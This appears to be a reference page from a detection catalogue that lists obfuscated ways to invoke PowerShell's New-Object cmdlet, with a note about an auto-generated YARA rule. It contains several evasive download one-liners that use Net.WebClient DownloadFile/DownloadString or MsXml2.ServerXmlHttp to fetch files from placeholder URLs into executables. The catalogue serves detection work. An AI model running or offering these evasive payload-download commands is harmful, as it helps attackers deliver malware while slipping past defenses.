New-Object
Creates .NET or COM objects. Used to instantiate WebClient for downloads, create COM shells, or access Windows APIs.
Binary Paths
PowerShell cmdlet
Glob Patterns
| Pattern | Notes |
|---|---|
& (gcm N*-Obj*) System.Net.WebClient
|
Wildcards on both verb and noun |
& (gcm New-Ob*) System.Net.WebClient
|
Star matches 'ject' |
& (gcm N?w-Object) System.Net.WebClient
|
Single char wildcard replaces 'e' |
& (gcm N[d-f]w-Object) System.Net.WebClient
|
Character range matches 'e' in New |
(& (gcm N*-Obj*) Net.WebClient).DownloadFile('http://...','C:\p.exe')
|
Full download one-liner with glob-resolved cmdlet |
& (gcm *Object) Net.WebClient
|
Prefix wildcard |
(& (gcm N*-Obj*) -ComObject MsXml2.ServerXmlHttp).Open('GET','http://...',$false)
|
gcm glob on New-Object; -ComObject instantiates MsXml2.ServerXmlHttp COM object |
(& (gcm N?w-Ob*) -ComObject MsXml2.ServerXmlHttp).Open('GET','http://...',$false)
|
Mixed ? and * wildcards on New-Object with -ComObject |
$w=New-Object Net.WebClient;$w.(($w.PsObject.Methods|?{$_.Name-clike'D*g'}).Name).Invoke('http://...')
|
-clike 'D*g' resolves DownloadString method on Net.WebClient via PSObject.Methods |
$w=New-Object Net.WebClient;$w.(($w.PsObject.Methods|?{$_.Name-clike'D*F*'}).Name).Invoke('http://...','C:\out.exe')
|
-clike 'D*F*' resolves DownloadFile method |
& (gcm ('{0}ew-{1}' -f 'N','Object')) Net.WebClient
|
-f format operator constructs 'New-Object' from string fragments before gcm resolves it |
& (gcm ('New'+'-Ob'+'ject')) Net.WebClient
|
String concatenation builds the cmdlet name from three fragments — full name never appears contiguous in source |
& (gcm N[d-f]w-Object) Net.WebClient
|
Character range [d-f] matches 'e' in New — only character in range that satisfies New-Object |
Pattern Tester
$
Try typing New-Object or a full path like PowerShell cmdlet
YARA Rule
Auto-generated detection rule for New-Object